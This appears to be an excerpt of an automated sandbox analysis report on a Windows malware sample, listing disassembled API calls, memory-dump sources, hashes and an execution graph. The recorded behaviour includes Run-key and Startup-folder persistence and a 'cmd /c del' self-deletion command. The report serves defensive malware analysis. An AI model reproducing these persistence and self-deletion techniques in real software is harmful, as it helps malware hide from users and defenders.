                                          • Part of subcall function 004014CB: PathAddBackslashA.SHLWAPI(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\), ref: 00401574
                                          • Part of subcall function 004014CB: SHGetSpecialFolderPathA.SHELL32(00000000,00409450,00000010,00000001), ref: 00401585
                                          • Part of subcall function 004014CB: PathAddBackslashA.SHLWAPI(00409450), ref: 00401590
                                          • Part of subcall function 004014CB: FindResourceA.KERNEL32(00000000,00000001,0000000A), ref: 004015B4
                                          • Part of subcall function 004014CB: ExitProcess.KERNEL32(00000000,?,?,?,?,00410694,00000000,00406450,C0000000,00000003,00000000,00000002,00000080,00000000,00406450,00410060), ref: 00401A06
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1676806976.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1676793353.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676822719.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676862014.0000000000403000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676862014.0000000000408000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676862014.0000000000410000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676905599.0000000000411000.00000008.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676977396.00000000004AB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_0zu73p2YBu.jbxd
                                        Similarity
                                        • API ID: Path$Backslash$DirectoryFileFindFolderNameSpecial$EnvironmentExitMessageModuleProcProcessResourceSendSystemTempVariableWindowWindows
                                        • String ID:
                                        • API String ID: 3165515907-0
                                        • Opcode ID: 6e41b82b1a59110096b7f5e1eaf1704465141be8ffeca4895ea9e4f7652cdaec
                                        • Instruction ID: 0d19c5dcc5aa2c104d2bcf641a834dc402774fcf6836afafd324fc60c71b67c5
                                        • Opcode Fuzzy Hash: 6e41b82b1a59110096b7f5e1eaf1704465141be8ffeca4895ea9e4f7652cdaec
                                        • Instruction Fuzzy Hash: 0BF08C31240208B7CF25AE628C03B8A37629B04719F10C03BFB193C0F297BDE660DA5E

                                        Control-flow Graph

                                        control_flow_graph 137 40144a-401451 138 401454-401461 137->138 138->138 139 401463-401465 138->139
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1676806976.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1676793353.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676822719.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676862014.0000000000403000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676862014.0000000000408000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676862014.0000000000410000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676905599.0000000000411000.00000008.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676977396.00000000004AB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_0zu73p2YBu.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a9990774af4119fa70ef41400092c50f263bdf1d164bc37f887e3c0d7a250b32
                                        • Instruction ID: 8fa38f81e8242696ce0cc31d39bb87820c0085d6c7506b9eb7d826ca0eb98f77
                                        • Opcode Fuzzy Hash: a9990774af4119fa70ef41400092c50f263bdf1d164bc37f887e3c0d7a250b32
                                        • Instruction Fuzzy Hash: 52C012B711004827DB089509D8429D6B798D6B5365718811BF906DE292E97CE941C5A4

                                        Control-flow Graph

                                        control_flow_graph 123 401a10-401a6e lstrcpyA lstrcatA * 4 ShellExecuteA
                                        APIs
                                        • lstrcpyA.KERNEL32(0040D450), ref: 00401A15
                                        • lstrcatA.KERNEL32(0040D450,0040A450,0040D450), ref: 00401A24
                                        • lstrcatA.KERNEL32(0040D450," ",0040D450,0040A450,0040D450), ref: 00401A33
                                        • lstrcatA.KERNEL32(0040D450,0040B450,0040D450," ",0040D450,0040A450,0040D450), ref: 00401A42
                                        • lstrcatA.KERNEL32(0040D450," >> NUL,0040D450,0040B450,0040D450," ",0040D450,0040A450,0040D450), ref: 00401A51
                                        • ShellExecuteA.SHELL32(00000000,00000000,0040F450,0040D450,00000000,00000000), ref: 00401A68
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1676806976.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1676793353.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676822719.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676862014.0000000000403000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676862014.0000000000408000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676862014.0000000000410000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676905599.0000000000411000.00000008.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676977396.00000000004AB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_0zu73p2YBu.jbxd
                                        Similarity
                                        • API ID: lstrcat$ExecuteShelllstrcpy
                                        • String ID: " "$" >> NUL
                                        • API String ID: 742256116-2884213582
                                        • Opcode ID: f7b28a052863698766e7caa9bcc0667b7caf2ac5db88afa528486488b0d02c9d
                                        • Instruction ID: c67f771b86db4121d1babd1f488120d3e12b037d12f8b34daf4744ac84752cfb
                                        • Opcode Fuzzy Hash: f7b28a052863698766e7caa9bcc0667b7caf2ac5db88afa528486488b0d02c9d
                                        • Instruction Fuzzy Hash: 84E0A27CBC434935D81036E10F07F5965258B54F1DF32803BB245385EB5AFCB118A02E

                                        Control-flow Graph

                                        APIs
                                        • RegCreateKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00000000,00000000,000F003F,00000000,00410060,00000000), ref: 0040148B
                                        • lstrlenA.KERNEL32(Pd@`,00410660,0000000F), ref: 004014A0
                                        • RegSetValueExA.ADVAPI32(?,00410660,00000000,00000001,?,-00000001,Pd@`,00410660,0000000F), ref: 004014B8
                                        • RegCloseKey.ADVAPI32(?), ref: 004014C1
                                        Strings
                                        • Pd@`, xrefs: 0040149D
                                        • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00401481
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1676806976.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1676793353.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676822719.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676862014.0000000000403000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676862014.0000000000408000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676862014.0000000000410000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676905599.0000000000411000.00000008.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676977396.00000000004AB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_0zu73p2YBu.jbxd
                                        Similarity
                                        • API ID: CloseCreateValuelstrlen
                                        • String ID: Pd@`$Software\Microsoft\Windows\CurrentVersion\Run
                                        • API String ID: 1356686001-3638029297
                                        • Opcode ID: 0815aa4abac9622c084a24d5d1959e099eae3d3f69ea637e4f878cb797079dd3
                                        • Instruction ID: 694becdac4f8bd3b9b7976167e3761c6cf6cdd6dc00f17d18d4396d85fea8140
                                        • Opcode Fuzzy Hash: 0815aa4abac9622c084a24d5d1959e099eae3d3f69ea637e4f878cb797079dd3
                                        • Instruction Fuzzy Hash: 5EF030717C0308BBFB215B90DC07FED7A29AB50B04F204031B701B80E6CAF55AA0A65D

                                        Control-flow Graph

                                        control_flow_graph 127 401a92-401ad7 lstrcpyA lstrcatA * 2 ShellExecuteA
                                        APIs
                                        • lstrcpyA.KERNEL32(0040F950,/c del ",004019F4,?,?,?,?,00410694,00000000,00406450,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 00401A9C
                                        • lstrcatA.KERNEL32(0040F950,0040B450,0040F950,/c del ",004019F4,?,?,?,?,00410694,00000000,00406450,C0000000,00000003,00000000,00000002), ref: 00401AAB
                                        • lstrcatA.KERNEL32(0040F950," >> NUL,0040F950,0040B450,0040F950,/c del ",004019F4,?,?,?,?,00410694,00000000,00406450,C0000000,00000003), ref: 00401ABA
                                        • ShellExecuteA.SHELL32(00000000,00000000,0040F450,0040F950,00000000,00000000), ref: 00401AD1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1676806976.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1676793353.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676822719.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676862014.0000000000403000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676862014.0000000000408000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676862014.0000000000410000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676905599.0000000000411000.00000008.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676977396.00000000004AB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_0zu73p2YBu.jbxd
                                        Similarity
                                        • API ID: lstrcat$ExecuteShelllstrcpy
                                        • String ID: " >> NUL$/c del "
                                        • API String ID: 742256116-2706327707
                                        • Opcode ID: a1070831e0bea9541da9ac62f5628a9e4d215df999206135537e60c8682be13e
                                        • Instruction ID: 00c8236249b174e54b049ae4d3aed823565817e79cb25063840e3e3a81eaf472
                                        • Opcode Fuzzy Hash: a1070831e0bea9541da9ac62f5628a9e4d215df999206135537e60c8682be13e
                                        • Instruction Fuzzy Hash: 23D0E9B43C430735E83036510E07F9559154754F1AF31803BB305389F25AFCB108621D

                                        Execution Graph

                                        Execution Coverage:3%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:3.6%
                                        Total number of Nodes:784
                                        Total number of Limit Nodes:4
19014->18996 19014->19001 19014->19003 19014->19005 19014->19010 19025 4074f0 strlen RtlReAllocateHeap 19014->19025 19028 4030f0 RtlAllocateHeap RtlReAllocateHeap 19014->19028 19034 4036a2 16 API calls 19014->19034 19038 4022d4 19014->19038 19017 407550 HeapFree 19015->19017 19018 402428 19016->19018 19020 402497 19017->19020 19021 4074f0 2 API calls 19018->19021 19019->19010 19022 407550 HeapFree 19020->19022 19023 402432 19021->19023 19026 4024a0 19022->19026 19027 4074f0 2 API calls 19023->19027 19025->19014 19026->18789 19029 40243d 19027->19029 19028->19014 19031 4036a2 16 API calls 19029->19031 19030->19010 19032 402458 19031->19032 19035 402025 7 API calls 19032->19035 19032->19037 19033->19010 19034->19014 19035->19037 19037->19006 19039 402025 7 API calls 19038->19039 19039->19037 19041 402768 19040->19041 19041->19041 19042 403100 2 API calls 19041->19042 19043 402781 19042->19043 19044 403100 2 API calls 19043->19044 19045 40278e 19044->19045 19046 403100 2 API calls 19045->19046 19047 40279b ShellExecuteEx 19046->19047 19048 4027e2 Sleep GetExitCodeProcess 19047->19048 19049 402801 19048->19049 19049->19048 19050 40280d 19049->19050 19051 407550 HeapFree 19050->19051 19052 402822 19051->19052 19053 407550 HeapFree 19052->19053 19054 40282b 19053->19054 19055 407550 HeapFree 19054->19055 19056 401b22 19055->19056 19057 402025 19056->19057 19058 401b2d 19057->19058 19059 402032 19057->19059 19064 405ea0 19058->19064 19059->19058 19060 406960 5 API calls 19059->19060 19061 40206b 19060->19061 19062 402080 DeleteFileA 19061->19062 19063 405ea0 DeleteFileA 19061->19063 19062->19058 19063->19062 19065 405ea7 DeleteFileA 19064->19065 19066 401b38 19064->19066 19065->19066 19067 403a79 19066->19067 19068 407750 RtlReAllocateHeap 19067->19068 19069 403a8b GetModuleFileNameA strcmp 19068->19069 19070 403ac2 19069->19070 19071 403aae memmove 19069->19071 19070->18831 19071->19070 19074 405e25 19072->19074 19073 407750 RtlReAllocateHeap 19075 405e62 19073->19075 
19074->19073 19076 401b65 19075->19076 19077 405e76 strncpy 19075->19077 19078 405e90 19076->19078 19077->19076 19079 405e97 SetCurrentDirectoryA 19078->19079 19080 401b79 _rmdir 19078->19080 19079->19080 19080->18678 19354 407650 19081->19354 19083 40113a 19083->18624 19361 4038b5 19084->19361 19089 4038b5 12 API calls 19090 4036cb 19089->19090 19090->18688 19092 403a2b 19091->19092 19093 403957 GetCommandLineA 19092->19093 19094 403a40 19093->19094 19095 407750 RtlReAllocateHeap 19094->19095 19096 403a4e strncpy 19095->19096 19096->18693 19379 404b03 19097->19379 19099 401528 19100 4042bd 19099->19100 19403 4041cf 19100->19403 19103 4043ae 19104 4043bf 19103->19104 19105 404422 CreateWindowExA 19104->19105 19106 4043cf memset 19104->19106 19108 404472 19105->19108 19112 401574 19105->19112 19106->19105 19109 40662c 2 API calls 19108->19109 19110 404480 SetWindowLongA 19109->19110 19111 4047bb 4 API calls 19110->19111 19111->19112 19113 4045b3 19112->19113 19417 4044f0 19113->19417 19116 404e09 19118 404e23 19116->19118 19117 4015ab 19124 4045d3 19117->19124 19118->19117 19119 404eb2 RtlReAllocateHeap 19118->19119 19120 404e8f RtlAllocateHeap 19118->19120 19121 404ea1 19118->19121 19119->19121 19120->19121 19122 404f06 DestroyAcceleratorTable 19121->19122 19123 404f0d CreateAcceleratorTableA 19121->19123 19122->19123 19123->19117 19126 4045da 19124->19126 19125 4045f3 SetFocus 19127 4045f9 19125->19127 19126->19125 19126->19127 19127->18748 19427 404f24 19128->19427 19132 40460c 19131->19132 19133 40461c 19132->19133 19134 404625 GetWindowTextLengthA 19132->19134 19133->18757 19135 407750 RtlReAllocateHeap 19134->19135 19136 40463b GetWindowTextA strlen 19135->19136 19136->19133 19138 40493d 19137->19138 19139 404947 GetWindow 19138->19139 19140 404a0e 19138->19140 19141 404962 RemovePropA RemovePropA 19139->19141 19142 404955 19139->19142 19140->18778 19144 404980 RevokeDragDrop 19141->19144 19145 404988 19141->19145 19142->19141 19143 40495b SetActiveWindow 
19142->19143 19143->19141 19144->19145 19146 4049a1 sprintf UnregisterClassA 19145->19146 19147 40498f SendMessageA 19145->19147 19148 4049d3 19146->19148 19147->19148 19150 4049f2 19148->19150 19151 4049da HeapFree DestroyAcceleratorTable 19148->19151 19152 404a00 19150->19152 19153 4049f9 DeleteObject 19150->19153 19151->19150 19154 4066bb 2 API calls 19152->19154 19153->19152 19154->19140 19156 40686d 19155->19156 19453 4073b0 19156->19453 19158 406890 19159 407750 RtlReAllocateHeap 19158->19159 19160 401696 19159->19160 19160->18796 19162 401d47 19161->19162 19162->19162 19163 403100 2 API calls 19162->19163 19164 401d60 19163->19164 19456 403110 19164->19456 19167 4030a0 RtlAllocateHeap 19168 401d87 19167->19168 19169 403110 HeapFree 19168->19169 19170 401d9f 19169->19170 19171 4030a0 RtlAllocateHeap 19170->19171 19172 401dae 19171->19172 19173 403110 HeapFree 19172->19173 19174 401dc6 19173->19174 19175 4030a0 RtlAllocateHeap 19174->19175 19176 401dd5 19175->19176 19459 4024a8 19176->19459 19179 4024a8 5 API calls 19180 401df9 19179->19180 19181 4024a8 5 API calls 19180->19181 19191 401e0d 19181->19191 19182 401f91 19183 407550 HeapFree 19182->19183 19184 401fff 19183->19184 19185 403110 HeapFree 19184->19185 19186 402009 19185->19186 19187 403110 HeapFree 19186->19187 19188 402012 19187->19188 19190 403110 HeapFree 19188->19190 19189 403dc0 RtlAllocateHeap 19189->19191 19193 40201b 19190->19193 19191->19182 19191->19189 19192 401f5a _rmdir 19191->19192 19477 403ec0 19191->19477 19194 4036a2 16 API calls 19192->19194 19193->18713 19194->19191 19197 407750 RtlReAllocateHeap 19196->19197 19198 405de7 GetCurrentDirectoryA 19197->19198 19199 405df7 19198->19199 19199->18764 19201 40370d CoInitialize 19200->19201 19202 40371e memset LoadLibraryA 19200->19202 19201->19202 19203 403834 19202->19203 19204 403748 strncpy strlen 19202->19204 19205 407750 RtlReAllocateHeap 19203->19205 19207 40378d GetProcAddress 19204->19207 19208 40377f 19204->19208 19212 40383d 
19205->19212 19209 40390d 3 API calls 19207->19209 19208->19207 19210 4037ac 19209->19210 19211 4038b5 12 API calls 19210->19211 19213 4037cd 19211->19213 19212->18771 19214 4038b5 12 API calls 19213->19214 19215 4037de 19214->19215 19216 4037e3 GetProcAddress 19215->19216 19217 403826 FreeLibrary 19215->19217 19218 407750 RtlReAllocateHeap 19216->19218 19217->19203 19217->19212 19219 4037f8 CoTaskMemFree strlen 19218->19219 19219->19217 19221 40381e 19219->19221 19221->19217 19484 406060 19222->19484 19224 4018b0 19224->18821 19224->18824 19225->18861 19226->18864 19228 404ad4 LoadIconA LoadCursorA 19227->19228 19228->18867 19229->18872 19231 401087 19230->19231 19231->18884 19233 403188 19232->19233 19234 403139 19232->19234 19233->18885 19234->19233 19235 40316e HeapFree 19234->19235 19235->19234 19237 4077a2 19236->19237 19238 40776f RtlReAllocateHeap 19236->19238 19237->18897 19238->19237 19240 4075b3 RtlReAllocateHeap 19239->19240 19241 407597 RtlAllocateHeap 19239->19241 19242 4075d4 19240->19242 19241->19242 19242->18900 19247 40642d 19243->19247 19245 403969 GetCommandLineA 19246 401307 GetModuleHandleA 19245->19246 19246->18680 19246->18693 19247->19245 19254 407600 19248->19254 19250 4020c1 FindResourceA 19250->18920 19250->18921 19252 40755b HeapFree 19251->19252 19253 40139a 19251->19253 19252->19253 19253->18683 19253->18684 19255 407647 19254->19255 19256 40760a strlen RtlAllocateHeap 19254->19256 19255->19250 19256->19255 19258 407750 RtlReAllocateHeap 19257->19258 19259 405ec5 GetTempPathA LoadLibraryA 19258->19259 19260 405f00 19259->19260 19261 405ee2 GetProcAddress 19259->19261 19260->18928 19262 405ef2 GetLongPathNameA 19261->19262 19263 405ef9 FreeLibrary 19261->19263 19262->19263 19263->19260 19265 403e5d 19264->19265 19266 407750 RtlReAllocateHeap 19265->19266 19267 403e7a 19266->19267 19268 403e80 memcpy 19267->19268 19269 401c2c 19267->19269 19268->19269 19269->18933 19270->18936 19272 405f22 strncpy strlen 19271->19272 19273 401c56 
19271->19273 19275 405f52 CreateDirectoryA 19272->19275 19273->18941 19275->19273 19277 406636 19276->19277 19278 40664d 19276->19278 19288 4067da RtlAllocateHeap 19277->19288 19280 406657 RtlReAllocateHeap 19278->19280 19281 406185 CreateFileA 19278->19281 19280->19281 19281->18966 19281->18967 19283 4066e2 19282->19283 19284 4066c7 19282->19284 19290 40681d 19283->19290 19284->19283 19285 4066cc memset 19284->19285 19287 4066ec 19285->19287 19287->18970 19289 4067f0 19288->19289 19289->19281 19291 40682e HeapFree 19290->19291 19291->19287 19294 406365 19293->19294 19295 406345 SetFilePointer 19293->19295 19296 4063de 19294->19296 19298 406370 19294->19298 19295->19294 19304 405f90 19296->19304 19300 4063a3 19298->19300 19303 406389 memcpy 19298->19303 19300->18975 19301 40640b memcpy 19301->18975 19302 4063eb WriteFile 19302->18975 19303->18975 19305 405fa1 WriteFile 19304->19305 19306 405fc5 19304->19306 19305->19306 19306->19301 19306->19302 19308 40322e 19307->19308 19309 403292 19308->19309 19311 403287 strncpy 19308->19311 19310 407750 RtlReAllocateHeap 19309->19310 19312 403299 19310->19312 19311->19309 19313 4032aa 19312->19313 19314 40329f strncpy 19312->19314 19313->18997 19314->19313 19316 406324 19315->19316 19317 4062e0 19315->19317 19316->19010 19317->19316 19318 406312 WriteFile 19317->19318 19319 406304 19317->19319 19318->19316 19320 406330 5 API calls 19319->19320 19321 40630c 19320->19321 19321->19010 19341 4064a1 19322->19341 19325 403fcd 19325->19010 19327 406973 CreateFileA 19326->19327 19328 406b14 19326->19328 19327->19328 19329 40699c RtlAllocateHeap 19327->19329 19328->19010 19330 406b0c CloseHandle 19329->19330 19332 4069be 19329->19332 19330->19328 19331 4069c0 ReadFile 19331->19332 19332->19331 19332->19332 19333 406afb HeapFree 19332->19333 19333->19330 19346 403440 19334->19346 19336 4023c5 19337 4035f0 19336->19337 19338 4035fd 19337->19338 19338->19338 19339 407750 RtlReAllocateHeap 19338->19339 19340 403664 19339->19340 
19340->19002 19342 403fb2 memset 19341->19342 19343 406526 RtlAllocateHeap 19341->19343 19342->19325 19343->19342 19345 406567 RtlAllocateHeap 19343->19345 19345->19342 19347 40344f 19346->19347 19348 407750 RtlReAllocateHeap 19347->19348 19350 403496 19348->19350 19349 40358c 19349->19336 19350->19349 19350->19350 19351 403500 RtlAllocateHeap 19350->19351 19353 403520 19350->19353 19351->19353 19352 403579 HeapFree 19352->19349 19353->19349 19353->19352 19355 407661 strlen 19354->19355 19356 4076ca 19354->19356 19357 407694 RtlReAllocateHeap 19355->19357 19358 407678 RtlAllocateHeap 19355->19358 19359 4076d2 HeapFree 19356->19359 19360 4076b5 19356->19360 19357->19360 19358->19360 19359->19360 19360->19083 19362 4038bc EnumWindows 19361->19362 19367 4038cd 19361->19367 19363 4036aa 19362->19363 19371 40384e GetWindowThreadProcessId GetCurrentThreadId 19362->19371 19368 40390d GetForegroundWindow 19363->19368 19364 4038da GetCurrentThreadId 19365 4038e9 EnableWindow 19364->19365 19364->19367 19366 40681d HeapFree 19365->19366 19366->19367 19367->19363 19367->19364 19369 4036bb MessageBoxA 19368->19369 19370 40391e GetWindowThreadProcessId GetCurrentProcessId 19368->19370 19369->19089 19370->19369 19372 4038ac 19371->19372 19373 40386c IsWindowVisible 19371->19373 19373->19372 19374 403877 IsWindowEnabled 19373->19374 19374->19372 19375 403882 GetForegroundWindow 19374->19375 19375->19372 19376 40388c EnableWindow 19375->19376 19377 4067da RtlAllocateHeap 19376->19377 19378 4038a1 GetCurrentThreadId 19377->19378 19378->19372 19380 40662c 2 API calls 19379->19380 19381 404b24 sprintf 19380->19381 19383 404b55 19381->19383 19384 404b5c memset RegisterClassA 19381->19384 19383->19384 19385 404bb6 AdjustWindowRect 19384->19385 19387 404c25 19385->19387 19388 404c73 19387->19388 19389 404c3c GetSystemMetrics 19387->19389 19390 404cc9 CreateWindowExA 19388->19390 19393 404c89 GetWindowRect 19388->19393 19394 404c7f GetActiveWindow 19388->19394 19391 404c49 19389->19391 
19392 404c4c GetSystemMetrics 19389->19392 19395 404d01 SetPropA 19390->19395 19396 404dbc UnregisterClassA 19390->19396 19391->19392 19397 404c63 19392->19397 19393->19397 19394->19390 19394->19393 19399 404d17 ShowWindow 19395->19399 19400 404d39 RtlAllocateHeap CreateAcceleratorTableA 19395->19400 19398 4066bb 2 API calls 19396->19398 19397->19390 19401 404daa 19398->19401 19399->19400 19400->19401 19401->19099 19404 4041e0 19403->19404 19405 4041f0 memset 19404->19405 19406 404243 CreateWindowExA 19404->19406 19405->19406 19408 404291 19406->19408 19409 40154c 19406->19409 19410 40662c 2 API calls 19408->19410 19409->19103 19411 40429f 19410->19411 19413 4047bb 19411->19413 19414 4047cd 19413->19414 19415 4047dc SetWindowLongA SetWindowLongA SetPropA SendMessageA 19414->19415 19416 40482d 19415->19416 19416->19409 19418 404502 19417->19418 19419 404514 memset 19418->19419 19420 40454b CreateWindowExA 19418->19420 19419->19420 19422 40458f 19420->19422 19426 401597 19420->19426 19423 40662c 2 API calls 19422->19423 19424 40459d 19423->19424 19425 4047bb 4 API calls 19424->19425 19425->19426 19426->19116 19428 404f38 19427->19428 19429 404f69 19428->19429 19430 404f50 HeapFree 19428->19430 19431 404f5a HeapFree 19428->19431 19432 404fa3 19429->19432 19433 404f74 HeapFree 19429->19433 19430->19431 19431->19429 19434 404ff3 GetMessageA 19432->19434 19435 404fac PeekMessageA 19432->19435 19444 404f9b 19433->19444 19436 404ffd GetActiveWindow 19434->19436 19435->19436 19437 404fbe 19435->19437 19445 405d3c GetKeyState 19436->19445 19438 404fca MsgWaitForMultipleObjects 19437->19438 19437->19444 19440 404fe2 PeekMessageA 19438->19440 19438->19444 19440->19436 19440->19444 19441 40500b 19442 40501f TranslateMessage DispatchMessageA 19441->19442 19443 40500f TranslateAccelerator 19441->19443 19442->19444 19443->19442 19443->19444 19444->18748 19446 405d50 GetKeyState 19445->19446 19447 405daa GetPropA 19445->19447 19446->19447 19448 405d58 GetKeyState 19446->19448 19450 
405dbc 19447->19450 19448->19447 19449 405d60 GetKeyState 19448->19449 19449->19447 19451 405d68 GetFocus GetClassNameA strncmp 19449->19451 19450->19441 19451->19447 19452 405d94 GetFocus SendMessageA 19451->19452 19452->19447 19452->19450 19454 4073c0 19453->19454 19455 407455 memset 19454->19455 19455->19158 19457 403115 HeapFree 19456->19457 19458 401d78 19456->19458 19457->19458 19458->19167 19460 4024b0 19459->19460 19460->19460 19461 403100 2 API calls 19460->19461 19462 4024c9 19461->19462 19463 403110 HeapFree 19462->19463 19464 4024e1 19463->19464 19465 4030a0 RtlAllocateHeap 19464->19465 19466 4024f0 19465->19466 19467 403110 HeapFree 19466->19467 19468 402508 19467->19468 19469 4030a0 RtlAllocateHeap 19468->19469 19470 402517 19469->19470 19471 407550 HeapFree 19470->19471 19472 402744 19471->19472 19473 403110 HeapFree 19472->19473 19474 40274e 19473->19474 19475 403110 HeapFree 19474->19475 19476 401de5 19475->19476 19476->19179 19478 403ec8 19477->19478 19479 403eeb 19477->19479 19480 403ed1 RtlReAllocateHeap 19478->19480 19481 403ee3 19478->19481 19479->19191 19480->19191 19482 403dc0 RtlAllocateHeap 19481->19482 19483 403ee8 19482->19483 19483->19191 19485 40662c 2 API calls 19484->19485 19486 406077 19485->19486 19487 40609a 19486->19487 19488 40607e CreateFileA 19486->19488 19490 4060bc 19487->19490 19491 40609f CreateFileA 19487->19491 19489 4060f9 19488->19489 19493 406149 19489->19493 19495 406106 RtlAllocateHeap 19489->19495 19490->19489 19492 4060c1 CreateFileA 19490->19492 19491->19489 19492->19489 19494 4060e3 CreateFileA 19492->19494 19496 40615c 19493->19496 19498 4066bb 2 API calls 19493->19498 19494->19489 19497 40613b 19495->19497 19496->19224 19497->19224 19498->19496 19499 401bb9 19506 403b0b 19499->19506 19503 401bc3 19513 404a13 19503->19513 19505 401bd2 19507 403ad4 19506->19507 19508 403aeb 19507->19508 19509 403add CloseHandle 19507->19509 19510 403af4 HeapFree 19508->19510 19511 401bbe 19508->19511 19509->19508 19510->19511 
19512 403cc0 SetUnhandledExceptionFilter 19511->19512 19512->19503 19514 404a23 19513->19514 19515 404a4d 19514->19515 19516 404925 13 API calls 19514->19516 19517 404a7b 19515->19517 19518 404a62 HeapFree 19515->19518 19519 404a6d HeapFree 19515->19519 19516->19514 19517->19505 19518->19519 19519->19517

                                        Control-flow Graph (graph image not reproduced; legend distinguishes executed and not executed blocks)
                                        APIs
                                        • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000), ref: 00406987
                                        • RtlAllocateHeap.NTDLL(00A40000,00000000,00001000), ref: 004069AA
                                        • ReadFile.KERNELBASE(00000000,00000000,00001000,?,00000000,?,?,00000000,00000000), ref: 004069CE
                                        • HeapFree.KERNEL32(00A40000,00000000,00000000,?,?,00000000,00000000), ref: 00406B05
                                        • CloseHandle.KERNELBASE(00000000,?,00000000,00000000), ref: 00406B0D
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: FileHeap$AllocateCloseCreateFreeHandleRead
                                        • String ID:
                                        • API String ID: 873069550-0
                                        • Opcode ID: 1357808eb39684694dda3eb8bae3d5a823f22cf334df4ffbb266c6879fa2417a
                                        • Instruction ID: 2c35df999285d4324d5b8a2bb6c6846afef495587d3451632d7a4ed779350fa2
                                        • Opcode Fuzzy Hash: 1357808eb39684694dda3eb8bae3d5a823f22cf334df4ffbb266c6879fa2417a
                                        • Instruction Fuzzy Hash: 55418B326403920BD3149F74ECDAB773760EB46301F09823AFB52A62D2D67DD514DB18

                                        Control-flow Graph (graph image not reproduced; legend distinguishes executed and not executed blocks)
                                        APIs
                                        • memset.MSVCRT ref: 0040100F
                                        • GetModuleHandleA.KERNEL32(00000000), ref: 0040101C
